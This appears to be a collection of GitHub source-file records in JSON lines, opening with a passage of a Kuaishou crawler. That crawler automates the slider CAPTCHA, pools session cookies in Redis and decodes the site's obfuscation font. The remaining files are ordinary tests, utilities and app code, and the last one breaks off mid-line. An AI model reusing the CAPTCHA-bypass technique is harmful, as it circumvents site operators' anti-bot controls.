driver.find_element_by_xpath('//*[@id=\"container_body\"]/div/div[1]/div/div[2]/img')\n web_image_width = bk_block.size\n web_image_width = web_image_width['width']\n bk_block_x = bk_block.location['x']\n\n try:\n slide_block = driver.find_element_by_xpath('//*[@id=\"slideBlock\"]') # 小滑块\n except:\n slide_block = driver.find_element_by_xpath('//*[@id=\"slideBlock\"]') # 小滑块\n slide_block_x = slide_block.location['x']\n bk_block = bk_block.get_attribute('src') # 大图 url\n\n slide_block = slide_block.get_attribute('src') # 小滑块 图片url\n slid_ing = driver.find_element_by_xpath('//div[@id=\"slide_bar_head\"]') # 滑块\n\n os.makedirs('./image/', exist_ok=True)\n self.urllib_download(bk_block, './image/bkBlock_%s.png' % self.timestamp)\n self.urllib_download(slide_block, './image/slideBlock_%s.png' % self.timestamp)\n time.sleep(0.5)\n img_bkblock = Image.open('./image/bkBlock_%s.png' % self.timestamp)\n real_width = img_bkblock.size[0]\n width_scale = float(real_width) / float(web_image_width)\n position = self.get_postion('./image/bkBlock_%s.png' % self.timestamp, './image/slideBlock_%s.png' % self.timestamp)\n real_position = position[1] / width_scale\n real_position = real_position - (slide_block_x - bk_block_x)\n track_list = self.get_track(real_position + 5)\n\n ActionChains(driver).click_and_hold(on_element=slid_ing).perform() # 点击鼠标左键,按住不放\n time.sleep(0.1)\n # print('第二步,拖动元素')\n for track in track_list:\n ActionChains(driver).move_by_offset(xoffset=track, yoffset=random.randrange(-2,2)).perform() # 鼠标移动到距离当前位置(x,y)\n # time.sleep(0.001)\n # ActionChains(driver).move_by_offset(xoffset=-random.randint(0, 1), yoffset=0).perform() # 微调,根据实际情况微调\n time.sleep(1)\n # print('第三步,释放鼠标')\n ActionChains(driver).release(on_element=slid_ing).perform()\n print('登录成功')\n time.sleep(2)\n self.driver.get(url)\n self.driver.implicitly_wait(5)\n\n # @classmethod\n def get_cookies_and_front(self, url):\n retry_times = 0\n cookie_dic = {}\n rds_len = self.rds.llen(\"kwai_cookies\")\n if rds_len <= 10:\n self.driver = webdriver.Chrome(options=self.chrome_options)\n while retry_times < 5:\n try:\n self.login_main(url)\n res = self.driver.find_element_by_xpath('//*[@id=\"slideBlock\"]')\n retry_times += 1\n print(\"retry_times \",retry_times)\n except Exception as e:\n print(e)\n cookie = self.driver.get_cookies()\n for k in cookie:\n cookie_dic[k[\"name\"]] = k[\"value\"]\n self.rds.lpush(\"kwai_cookies\", json.dumps(cookie_dic))\n # print(\"cookies:\",cookie_dic)\n self.after_quit()\n break\n else:\n cookie_dic = json.loads(self.rds.lindex(\"kwai_cookies\",random.randint(0,rds_len-1)))\n\n os_path = \"/home/hanye/\"\n page_html = requests.get(url,headers=self.first_page_headers,cookies=cookie_dic)\n # print(page_html.text)\n this_path = os.path.isdir(os_path)\n if not this_path:\n os_path = \".\"\n # font_face = self.driver.find_element_by_xpath(\"/html/head/style[1]\")\n font_woff_link = re.findall(\"url\\('(.*?)'\\)\\s+format\\('woff'\\)\", page_html.text)\n if not font_woff_link:\n self.delete_cookies(cookie_dic)\n self.get_cookies_and_front(url)\n woff_name = font_woff_link[0].split(\"/\")[-1]\n # print(woff_name)\n try:\n f = open(\"%s/%s.xml\" % (os_path, woff_name), encoding=\"utf-8\")\n except:\n woff = requests.get(font_woff_link[0],\n headers={\n \"Referer\": url,\n \"Sec-Fetch-Mode\": \"cors\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36\"}).content\n with open(\"%s/%s\" % (os_path, woff_name), \"wb\") as f:\n f.write(woff)\n font = TTFont(\"%s/%s\" % (os_path, woff_name))\n font.saveXML(\"%s/%s.xml\" % (os_path, woff_name))\n f = open(\"%s/%s.xml\" % (os_path, woff_name), encoding=\"utf-8\")\n\n # f = open(\"./%s.xml\" % woff_name, encoding=\"utf-8\")\n self.xml_text = f.read()\n self.uni_code_dic = self.get_num_dic()\n self.del_file()\n return cookie_dic,self.uni_code_dic\n\n def delete_cookies(self,cookie_dic):\n # print(type(json.dumps(cookie_dic)))\n res = self.rds.lrem(\"kwai_cookies\",1,json.dumps(cookie_dic))\n\n def del_file(self):\n file_path = [\"./image/bkBlock_%s.png\" % self.timestamp,\"./image/slideBlock_%s.png\" % self.timestamp,\"./image/temp_%s.jpg\" % self.timestamp,\"./image/targ_%s.jpg\" % self.timestamp]\n for single_path in file_path:\n try:\n os.remove(single_path)\n except:\n continue\n\n# login = Login()\n\n# if __name__ == '__main__':\n# login = Login()\n# cookie_dic,uni_code_dic = login.get_cookies_and_front(\"https://live.kuaishou.com/profile/3xw8s48b2q7htx9?csr=true\")\n","repo_name":"litaolemo/crawler","sub_path":"crawler_sys/utils/func_verification_code.py","file_name":"func_verification_code.py","file_ext":"py","file_size_in_byte":15953,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"38776485791","text":"import fault\n\nfrom magma_examples.shift_register import ShiftRegister\n\n\ndef test_shift_register():\n tester = fault.SynchronousTester(ShiftRegister, clock=ShiftRegister.CLK)\n seq = [0, 1, 1, 0, 1, 0, 0, 1]\n delay = [0, 0, 0]\n in_seq, out_seq = seq + delay, delay + seq\n for i, o in zip(in_seq, out_seq):\n tester.circuit.I = i\n tester.advance_cycle()\n tester.circuit.O.expect(o)\n tester.compile_and_run(\"verilator\", magma_output=\"mlir-verilog\")\n","repo_name":"leonardt/magma_examples","sub_path":"tests/test_shift_register.py","file_name":"test_shift_register.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10296097424","text":"COMPONENT_NAME_LENGTH = 100\n\n# Project name and slug length\nPROJECT_NAME_LENGTH = 60\n\n# Repository length\nREPO_LENGTH = 300\nBRANCH_LENGTH = 200\n\n# Maximal length of filename or mask\nFILENAME_LENGTH = 400\n\n# User model length\n# Note: This is currently limited by 192 to allow index on MySQL\nFULLNAME_LENGTH = 150\nUSERNAME_LENGTH = 150\nEMAIL_LENGTH = 190\n\n# Language\nLANGUAGE_CODE_LENGTH = 50\nLANGUAGE_NAME_LENGTH = 100\n\n# Variant\nVARIANT_REGEX_LENGTH = 190\n# Needed for unique index on MySQL\nVARIANT_KEY_LENGTH = 576\n\n# Maximal categories depth\nCATEGORY_DEPTH = 3\n","repo_name":"WeblateOrg/weblate","sub_path":"weblate/trans/defines.py","file_name":"defines.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":3905,"dataset":"github-code","pt":"52"} +{"seq_id":"29207055665","text":"from tqdm.notebook import tqdm\nimport torch\n\n\ndef train(model: torch.nn.Module,\n device: str,\n train_loader: torch.utils.data.DataLoader,\n optimizer: torch.optim.Optimizer,\n criterion: torch.nn.Module,\n epoch: int) -> tuple:\n \"\"\"Train the model for one epoch\n\n Args:\n model (Model): The model to train\n device (string): The device to use (cpu or cuda)\n train_loader (Dataloader): The training data loader\n optimizer (Optimizer): The optimizer to use\n criterion (Loss): The loss function to use\n epoch (int): The current epoch\n\n Returns:\n float, float : The training loss, the training accuracy\n \"\"\"\n # Initialize the training loss\n train_loss = 0.\n \n # Initialize the number of correct ranking predictions in order to compute\n # the accuracy\n train_correct = 0\n \n # Configure the model for training\n # (good practice, only necessary if the model operates differently for\n # training and validation)\n model.train()\n \n # Add a progress bar\n train_loader_pbar = tqdm(train_loader, unit=\"batch\")\n \n # Loop over the training batches\n for features1, features2, _, _ in train_loader_pbar:\n \n # Print the epoch and training mode\n train_loader_pbar.set_description(f\"Epoch {epoch} [train]\")\n \n # Move features to GPU (if available)\n features1 = features1.to(device)\n features2 = features2.to(device)\n \n # Zero out gradients before each backpropagation pass, to avoid that\n # they accumulate\n optimizer.zero_grad()\n \n # Perform forward pass\n predicted_costs1 = model(features1)\n predicted_costs2 = model(features2)\n \n # Compute loss \n loss = criterion(predicted_costs1,\n predicted_costs2)\n \n # Print the batch loss next to the progress bar\n train_loader_pbar.set_postfix(batch_loss=loss.item())\n \n # Perform backpropagation (update weights)\n loss.backward()\n \n # Adjust parameters based on gradients\n optimizer.step()\n \n # Accumulate batch loss to average over the epoch\n train_loss += loss.item()\n \n # Get the number of correct predictions\n train_correct += torch.sum(\n predicted_costs1 < predicted_costs2).item()\n \n # Compute the loss average over the epoch\n train_loss /= len(train_loader)\n \n # Compute the accuracy\n train_accuracy = 100*train_correct/len(train_loader.dataset)\n \n return train_loss, train_accuracy\n","repo_name":"TomRavaud/Internship-U2IS","sub_path":"src/traversal_cost/siamese_network/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41522427027","text":"# # -*- coding: utf-8 -*-\n\nfrom pineboolib.plugins.dgi.dgi_schema import dgi_schema\n\n\nclass dgi_qt(dgi_schema):\n\n def __init__(self):\n super(dgi_qt, self).__init__() # desktopEnabled y mlDefault a True\n self._name = \"qt\"\n self._alias = \"Qt5\"\n","repo_name":"Miguel-J/pineboo-buscar","sub_path":"pineboolib/plugins/dgi/dgi_qt.py","file_name":"dgi_qt.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7581984270","text":"\nfrom typing import List, Tuple\nfrom langchain.docstore.document import Document\nfrom langchain.document_loaders import CSVLoader\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom pathlib import Path\nfrom langchain.vectorstores import Chroma\nfrom langchain.chains import RetrievalQA\nfrom langchain.chains.question_answering import load_qa_chain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.callbacks import get_openai_callback\n\n\nimport shutil\nimport streamlit as st\nfrom dotenv import load_dotenv\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Comment\nimport requests\n\nimport logging\nimport os\n\nload_dotenv()\n\nlogging.basicConfig()\n\nclass Config():\n chunk_size = 5000\n chroma_persist_directory = 'chroma_store'\n embeddings = OpenAIEmbeddings()\n model = 'gpt-3.5-turbo-16k'\n # model = 'gpt-4'\n llm = ChatOpenAI(model=model, temperature=0)\n history_file = Path('chat_history.txt')\n\ncfg = Config()\n\nlogger = logging.getLogger(\"csv-chat\")\n\nlogging.root.setLevel(logging.INFO)\n\n\ndef load_csv(file_path: Path) -> List[Document]:\n \"\"\"\n Use the csv loader to load the CSV content as a list of strings.\n :param file_path: A CSV file path\n :return: the document list after extracting and splitting all CSV records.\n \"\"\"\n loader = CSVLoader(file_path=str(file_path), encoding=\"utf-8\")\n doc_list: List[Document] = loader.load()\n doc_list = [d for d in doc_list if d.page_content != 'Question: \\nAnswer: ']\n logger.info(f\"First item: {doc_list[0].page_content}\")\n logger.info(f\"Length of CSV list: {len(doc_list)}\")\n return split_docs(doc_list)\n\n\ndef split_docs(doc_list: List[Document]) -> List[Document]:\n \"\"\"\n Splits the documents in smaller chunks from a list of documents.\n :param doc_list: A list of documents.\n \"\"\"\n text_splitter = CharacterTextSplitter(chunk_size=cfg.chunk_size, chunk_overlap=0, separator=\"\\n\\n\")\n texts = text_splitter.split_documents(doc_list)\n return texts\n\n\ndef extract_embeddings(texts: List[Document], doc_path: Path) -> Chroma:\n \"\"\"\n Either saves the Chroma embeddings locally or reads them from disk, in case they exist.\n :return a Chroma wrapper around the embeddings.\n \"\"\"\n embedding_dir = f\"{cfg.chroma_persist_directory}/{doc_path.stem}\"\n # if Path(embedding_dir).exists():\n # return Chroma(persist_directory=embedding_dir, embedding_function=cfg.embeddings)\n if Path(embedding_dir).exists():\n shutil.rmtree(embedding_dir, ignore_errors=True)\n try:\n docsearch = Chroma.from_documents(texts, cfg.embeddings, persist_directory=embedding_dir)\n docsearch.persist()\n except Exception as e:\n logger.error(f\"Failed to process {doc_path}: {str(e)}\")\n return None\n return docsearch\n\n\ndef process_question(similar_docs: List[Document], user_question: str) -> str:\n \"\"\"\n Sends the question to the LLM.\n :param similar_docs: A list of documents with the documents retrieved from the vector database.\n :param user_question: A user question\n :return: The result computed by the LLM.\n \"\"\"\n chain = load_qa_chain(cfg.llm, chain_type='stuff')\n similar_texts = [d.page_content for d in similar_docs]\n with get_openai_callback() as callback:\n response = chain.run(input_documents=similar_docs, question=user_question)\n logger.info(callback)\n return response, similar_texts\n\n\ndef write_history(question):\n \"\"\"\n Writes the question into a local history file.\n :param question: The text to be written to the local history file.\n \"\"\"\n if len(question) > 0:\n with open(cfg.history_file, \"a\") as f:\n f.write(f\"{question}\\n\")\n\n\n@st.cache_data()\ndef read_history()-> List[str]:\n \"\"\"\n Reads and caches some historical questions. Which you can use to ask questions in the UI.\n :return: a list of questions.\n \"\"\"\n with open(cfg.history_file, \"r\") as f:\n return list(set([l for l in f.readlines() if len(l.strip()) > 0]))\n \n\ndef process_user_question(docsearch: Chroma, user_question: str):\n \"\"\"\n Receives a user question and searches for similar text documents in the vector database.\n Using the similar texts and the user question retrieves the response from the LLM.\n :param docsearch: The reference to the vector database object\n :param user_question: The question the user has typed.\n \"\"\"\n if user_question:\n similar_docs: List[Document] = docsearch.similarity_search(user_question, k = 5)\n response, similar_texts = process_question(similar_docs, user_question)\n st.markdown(response)\n if len(similar_texts) > 0:\n write_history(user_question)\n st.text(\"Similar entries (Vector database results)\")\n st.write(similar_texts)\n else:\n st.warning(\"This answer is unrelated to our context.\")\n \n\ndef init_streamlit(docsearch: Chroma, texts):\n \"\"\"\n Creates the streamlit user interface.\n Use streamlit like this:\n streamlit run ./chat_main.py\n \"\"\"\n title = \"Ask questions about Onepoint\"\n st.set_page_config(page_title=title)\n st.header(title)\n st.write(f\"Context with {len(texts)} entries\")\n simple_chat_tab, historical_tab = st.tabs([\"Simple Chat\", \"Historical Questions\"])\n with simple_chat_tab:\n user_question = st.text_input(\"Your question\")\n with st.spinner('Please wait ...'):\n process_user_question(docsearch=docsearch, user_question=user_question)\n with historical_tab:\n user_question_2 = st.selectbox(\"Ask a previous question\", read_history())\n with st.spinner('Please wait ...'):\n logger.info(f\"question: {user_question_2}\")\n process_user_question(docsearch=docsearch, user_question=user_question_2)\n\n\ndef load_texts(doc_location: str) -> Tuple[List[str], Path]:\n \"\"\"\n Loads the texts of the CSV file and concatenates all texts in a single list.\n :param doc_location: The document location.\n :return: a tuple with a list of strings and a path.\n \"\"\"\n doc_path = Path(doc_location)\n texts = []\n for p in doc_path.glob(\"*.csv\"):\n texts.extend(load_csv(p))\n logger.info(f\"Length of texts: {len(texts)}\")\n return texts, doc_path\n\n\ndef text_from_html(body):\n \"\"\"\n Used to extract the text in a HTML file.\n Please check: https://stackoverflow.com/a/1983219/2735286\n :param body: the content of the HTML file.\n \"\"\"\n def tag_visible(element):\n if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]']:\n return False\n if isinstance(element, Comment):\n return False\n return True\n\n soup = BeautifulSoup(body, 'html.parser')\n texts = soup.findAll(text=True)\n visible_texts = filter(tag_visible, texts) \n return u\" \".join(t.strip() for t in visible_texts).strip()\n\n\n\ndef load_website_texts(url_list: List[str]) -> List[Document]:\n \"\"\"\n Used to load website texts.\n :param url_list: The list with URLs\n :return: a list of documents\n \"\"\"\n documents: List[Document] = []\n for url in url_list:\n text = text_from_html(requests.get(url).text)\n text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=100, separator=\".\")\n texts = text_splitter.split_text(text)\n for t in texts:\n documents.append(Document(page_content=t))\n return documents\n\n\ndef main(doc_location: str ='onepoint_chat'):\n \"\"\"\n Main entry point for the application.\n It loads all texts from a specific folder and specific web pages, \n creates the vector database and initializes the user interface.\n :param doc_location: The location of the CSV files\n \"\"\"\n logger.info(f\"Using doc location {doc_location}.\")\n texts, doc_path = load_texts(doc_location=doc_location)\n website_texts = load_website_texts([\n 'https://www.onepointltd.com/',\n 'https://www.onepointltd.com/do-data-better/'\n ])\n texts.extend(website_texts)\n docsearch = extract_embeddings(texts=texts, doc_path=Path(doc_path))\n init_streamlit(docsearch=docsearch, texts=texts)\n\n\nif __name__ == \"__main__\":\n main(os.environ['DOC_LOCATION'])","repo_name":"gilfernandes/onepoint_chat","sub_path":"chat_main.py","file_name":"chat_main.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31446816915","text":"import os\nfrom django.test import TestCase, RequestFactory\nfrom rest_framework.parsers import FileUploadParser\nfrom django.contrib.auth.models import Group, User\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.test import APIRequestFactory, APIClient\nfrom base_app.models.base_models import DataFile\nfrom base_app.views import data_files\nfrom base_app.settings import BASE_DIR, DATA_FILE_URL\n\n\nclass DataFilesTestCase(TestCase):\n \"\"\"\n Test the data file API endpoint\n \"\"\"\n\n def set_up(self):\n self.factory = APIRequestFactory()\n self.client = APIClient()\n self.parser = FileUploadParser()\n self.user = User.objects.create_user(\n username=\"testuser\", password=\"testpassword\"\n )\n # self.token = Token.objects.create(user=self.user)\n self.researcher_group = Group.objects.create(name=\"Researcher\")\n self.user.groups.add(self.researcher_group)\n self.test_file_name = \"test_api_file.txt\"\n self.test_file_path = os.path.join(BASE_DIR, self.test_file_name)\n try:\n # Attempt to create a new file for writing\n with open(self.test_file_path, \"x\") as file:\n self.file_data = file.write(\"Hello, World!\")\n # You can perform additional write operations if needed\n except FileExistsError:\n # File already exists, handle the case accordingly\n pass\n\n self.file_data = {\"file\": open(self.test_file_path, \"rb\")}\n\n def test_data_files_get(self):\n request = self.factory.get(DATA_FILE_URL)\n response = data_files(request)\n self.assertEqual(response.status_code, 200)\n\n def test_data_files_post_authorized(self):\n self.client.force_authenticate(user=self.user)\n request = self.factory.post(\n DATA_FILE_URL, data=self.file_data, format=\"multipart\"\n )\n request.user = self.user\n response = data_files(request)\n self.assertEqual(response.status_code, 201)\n self.assertTrue(\n DataFile.objects.filter(file__icontains=self.test_file_name).exists()\n )\n\n def test_data_files_post_unauthorized(self):\n request = self.factory.post(\n DATA_FILE_URL, data=self.file_data, format=\"multipart\"\n )\n response = data_files(request)\n self.assertEqual(response.status_code, 401)\n self.assertFalse(\n DataFile.objects.filter(file__icontains=self.test_file_name).exists()\n )\n\n def tear_down(self):\n \"\"\"\n Close the file and clean the test files\n \"\"\"\n self.file_data[\"file\"].close()\n if os.path.exists(self.test_file_path):\n # File exists, remove it\n os.remove(self.test_file_path)\n","repo_name":"steno-aarhus/seedcase","sub_path":"seedcase/base_app/test/test_data_file_api.py","file_name":"test_data_file_api.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10760103597","text":"import argparse\nimport sys\nimport os\n\nfrom pychords.chordino import Chordino\n\n\ndef perform_extraction(args):\n \"\"\"\n Extracts song chords\n \"\"\"\n\n ch = Chordino(\n use_nnls=args.use_nnls,\n use_hart_notation=args.use_hart_notation,\n roll_on=args.roll_on,\n local_tunning=args.local_tunning,\n spectral_whitening=args.whitening,\n spectral_shape=args.shape,\n boost_n_likelihood=args.boost_n,\n )\n return ch.extract(args.input_file)\n\n\ndef print_chords(chords):\n for chord in chords:\n print(chord.chord, \" - \", chord.timestamp)\n\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument('input_file')\n parser.add_argument('--nnls-chroma-path')\n parser.add_argument(\n '--use-nnls', action='store_true', default=False)\n parser.add_argument(\n '--use-hart-notation', action='store_true', default=False)\n parser.add_argument(\n '--local-tunning', action='store_true', default=False)\n parser.add_argument(\n '--roll-on', type=float, default=1.0, help='Between 1 0 and 5')\n parser.add_argument(\n '--whitening', type=float, default=1.0, help='Between 0 and 1')\n parser.add_argument(\n '--shape', type=float, default=0.7, help='Between 0.5 and 0.9')\n parser.add_argument(\n '--boost-n', type=float, default=0.1, help='Between 0 and 1')\n\n return parser.parse_args(argv)\n\n\ndef main():\n args = parse_arguments(sys.argv[1:])\n\n if args.nnls_chroma_path:\n os.environ['VAMP_PATH'] = args.nnls_chroma_path\n chords = perform_extraction(args)\n\n print_chords(chords)\n\n\nmain()\n","repo_name":"joaquinco/pychords","sub_path":"pychords/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19583475760","text":"import unittest\nfrom system_class import System\nfrom stock_class import Stock\nfrom user_class import User\nfrom tag_class import Tag\n\nclass TestClasses(unittest.TestCase):\n\n def test_add_book_that_already_exists(self):\n book = System() \n book.delete_book('112-457-128-25')\n book.add_book('Singing', '112-457-128-25', '2017-03-04', 15, 'Craig', 'Chen')\n raised = False\n try:\n book.add_book('Singing', '112-457-128-25', '2017-03-04', 15, 'Craig', 'Chen')\n except:\n raised = True\n self.assertFalse(raised)\n\n def test_negative_stock_change(self):\n stock = Stock() \n with self.assertRaises(SystemExit):\n stock.increment_stock('13', -4)\n\n def test_add_more_than_one_tag(self):\n tag = Tag()\n raised = False\n try:\n tag.add_tag('112-457-128-25', 'Thriller')\n except:\n raised = True\n self.assertFalse(raised)\n \n def test_delete_book_not_in_system(self):\n book = System()\n raised = False\n try:\n book.delete_book('13')\n except:\n raised = True\n self.assertFalse(raised)\n\n def test_delete_book_in_system(self):\n book = System()\n raised = False\n try:\n book.delete_book('112-457-128-25')\n except:\n raised = True\n self.assertFalse(raised)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"ScientistCoco/book_store","sub_path":"test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29370198789","text":"__author__ = 'Sebastian Rieger'\n\nimport os;\n\nncat_path = \"C:\\\\Users\\\\Sebastian\\\\Downloads\\\\ncat\"\nwireshark_path = \"\\\"C:\\\\Program Files\\\\Wireshark\\\\Wireshark.exe\\\"\"\nvirl_host = \"192.168.0.150\"\npcap_port = input(\"Please enter the port of the live capture: \")\n\nos.system(ncat_path + \" \" + virl_host + \" \" + str(pcap_port) + \" | \" + wireshark_path + \" -k -i -\")\n","repo_name":"rlaneyjr/VIRL_Projects","sub_path":"virl-utils/capture-from-socket.py","file_name":"capture-from-socket.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32111252299","text":"given_list = input().split(\" \")\n\n\ndef rounded_numbers(some_list):\n new_list = []\n for num in some_list:\n current_num = float(num)\n rounded_num = round(current_num)\n new_list.append(rounded_num)\n return new_list\n\n\nprint(rounded_numbers(given_list))\n\n","repo_name":"pepapopova/SoftUni-Courses","sub_path":"Fundamentals/Functions/rounding.py","file_name":"rounding.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13850004204","text":"import inspect\nimport os\nimport re\nimport shutil\nimport stat\nfrom typing import Optional\n\nimport archspec\n\nimport llnl.util.filesystem as fs\nimport llnl.util.lang as lang\nimport llnl.util.tty as tty\n\nimport spack.builder\nimport spack.config\nimport spack.deptypes as dt\nimport spack.detection\nimport spack.multimethod\nimport spack.package_base\nimport spack.spec\nimport spack.store\nfrom spack.directives import build_system, depends_on, extends, maintainers\nfrom spack.error import NoHeadersError, NoLibrariesError, SpecError\nfrom spack.install_test import test_part\nfrom spack.util.executable import Executable\nfrom spack.version import Version\n\nfrom ._checks import BaseBuilder, execute_install_time_tests\n\n\nclass PythonExtension(spack.package_base.PackageBase):\n maintainers(\"adamjstewart\")\n\n @property\n def import_modules(self):\n \"\"\"Names of modules that the Python package provides.\n\n These are used to test whether or not the installation succeeded.\n These names generally come from running:\n\n .. code-block:: python\n\n >> import setuptools\n >> setuptools.find_packages()\n\n in the source tarball directory. If the module names are incorrectly\n detected, this property can be overridden by the package.\n\n Returns:\n list: list of strings of module names\n \"\"\"\n modules = []\n pkg = self.spec[\"python\"].package\n\n # Packages may be installed in platform-specific or platform-independent\n # site-packages directories\n for directory in {pkg.platlib, pkg.purelib}:\n root = os.path.join(self.prefix, directory)\n\n # Some Python libraries are packages: collections of modules\n # distributed in directories containing __init__.py files\n for path in fs.find(root, \"__init__.py\", recursive=True):\n modules.append(\n path.replace(root + os.sep, \"\", 1)\n .replace(os.sep + \"__init__.py\", \"\")\n .replace(\"/\", \".\")\n )\n\n # Some Python libraries are modules: individual *.py files\n # found in the site-packages directory\n for path in fs.find(root, \"*.py\", recursive=False):\n modules.append(\n path.replace(root + os.sep, \"\", 1).replace(\".py\", \"\").replace(\"/\", \".\")\n )\n\n modules = [\n mod\n for mod in modules\n if re.match(\"[a-zA-Z0-9._]+$\", mod) and not any(map(mod.startswith, self.skip_modules))\n ]\n\n tty.debug(\"Detected the following modules: {0}\".format(modules))\n\n return modules\n\n @property\n def skip_modules(self):\n \"\"\"Names of modules that should be skipped when running tests.\n\n These are a subset of import_modules. If a module has submodules,\n they are skipped as well (meaning a.b is skipped if a is contained).\n\n Returns:\n list: list of strings of module names\n \"\"\"\n return []\n\n def view_file_conflicts(self, view, merge_map):\n \"\"\"Report all file conflicts, excepting special cases for python.\n Specifically, this does not report errors for duplicate\n __init__.py files for packages in the same namespace.\n \"\"\"\n conflicts = list(dst for src, dst in merge_map.items() if os.path.exists(dst))\n\n if conflicts and self.py_namespace:\n ext_map = view.extensions_layout.extension_map(self.extendee_spec)\n namespaces = set(x.package.py_namespace for x in ext_map.values())\n namespace_re = r\"site-packages/{0}/__init__.py\".format(self.py_namespace)\n find_namespace = lang.match_predicate(namespace_re)\n if self.py_namespace in namespaces:\n conflicts = list(x for x in conflicts if not find_namespace(x))\n\n return conflicts\n\n def add_files_to_view(self, view, merge_map, skip_if_exists=True):\n if not self.extendee_spec:\n return super().add_files_to_view(view, merge_map, skip_if_exists)\n\n bin_dir = self.spec.prefix.bin\n python_prefix = self.extendee_spec.prefix\n python_is_external = self.extendee_spec.external\n global_view = fs.same_path(python_prefix, view.get_projection_for_spec(self.spec))\n for src, dst in merge_map.items():\n if os.path.exists(dst):\n continue\n elif global_view or not fs.path_contains_subdirectory(src, bin_dir):\n view.link(src, dst)\n elif not os.path.islink(src):\n shutil.copy2(src, dst)\n is_script = fs.is_nonsymlink_exe_with_shebang(src)\n if is_script and not python_is_external:\n fs.filter_file(\n python_prefix,\n os.path.abspath(view.get_projection_for_spec(self.spec)),\n dst,\n )\n else:\n orig_link_target = os.path.realpath(src)\n new_link_target = os.path.abspath(merge_map[orig_link_target])\n view.link(new_link_target, dst)\n\n def remove_files_from_view(self, view, merge_map):\n ignore_namespace = False\n if self.py_namespace:\n ext_map = view.extensions_layout.extension_map(self.extendee_spec)\n remaining_namespaces = set(\n spec.package.py_namespace for name, spec in ext_map.items() if name != self.name\n )\n if self.py_namespace in remaining_namespaces:\n namespace_init = lang.match_predicate(\n r\"site-packages/{0}/__init__.py\".format(self.py_namespace)\n )\n ignore_namespace = True\n\n bin_dir = self.spec.prefix.bin\n global_view = self.extendee_spec.prefix == view.get_projection_for_spec(self.spec)\n\n to_remove = []\n for src, dst in merge_map.items():\n if ignore_namespace and namespace_init(dst):\n continue\n\n if global_view or not fs.path_contains_subdirectory(src, bin_dir):\n to_remove.append(dst)\n else:\n os.remove(dst)\n\n view.remove_files(to_remove)\n\n def test_imports(self):\n \"\"\"Attempts to import modules of the installed package.\"\"\"\n\n # Make sure we are importing the installed modules,\n # not the ones in the source directory\n python = inspect.getmodule(self).python\n for module in self.import_modules:\n with test_part(\n self,\n f\"test_imports_{module}\",\n purpose=f\"checking import of {module}\",\n work_dir=\"spack-test\",\n ):\n python(\"-c\", f\"import {module}\")\n\n def update_external_dependencies(self, extendee_spec=None):\n \"\"\"\n Ensure all external python packages have a python dependency\n\n If another package in the DAG depends on python, we use that\n python for the dependency of the external. If not, we assume\n that the external PythonPackage is installed into the same\n directory as the python it depends on.\n \"\"\"\n # TODO: Include this in the solve, rather than instantiating post-concretization\n if \"python\" not in self.spec:\n if extendee_spec:\n python = extendee_spec\n elif \"python\" in self.spec.root:\n python = self.spec.root[\"python\"]\n else:\n python = self.get_external_python_for_prefix()\n if not python.concrete:\n repo = spack.repo.PATH.repo_for_pkg(python)\n python.namespace = repo.namespace\n\n # Ensure architecture information is present\n if not python.architecture:\n host_platform = spack.platforms.host()\n host_os = host_platform.operating_system(\"default_os\")\n host_target = host_platform.target(\"default_target\")\n python.architecture = spack.spec.ArchSpec(\n (str(host_platform), str(host_os), str(host_target))\n )\n else:\n if not python.architecture.platform:\n python.architecture.platform = spack.platforms.host()\n if not python.architecture.os:\n python.architecture.os = \"default_os\"\n if not python.architecture.target:\n python.architecture.target = archspec.cpu.host().family.name\n\n # Ensure compiler information is present\n if not python.compiler:\n python.compiler = self.spec.compiler\n\n python.external_path = self.spec.external_path\n python._mark_concrete()\n self.spec.add_dependency_edge(python, depflag=dt.BUILD | dt.LINK | dt.RUN, virtuals=())\n\n def get_external_python_for_prefix(self):\n \"\"\"\n For an external package that extends python, find the most likely spec for the python\n it depends on.\n\n First search: an \"installed\" external that shares a prefix with this package\n Second search: a configured external that shares a prefix with this package\n Third search: search this prefix for a python package\n\n Returns:\n spack.spec.Spec: The external Spec for python most likely to be compatible with self.spec\n \"\"\"\n python_externals_installed = [\n s for s in spack.store.STORE.db.query(\"python\") if s.prefix == self.spec.external_path\n ]\n if python_externals_installed:\n return python_externals_installed[0]\n\n python_external_config = spack.config.get(\"packages:python:externals\", [])\n python_externals_configured = [\n 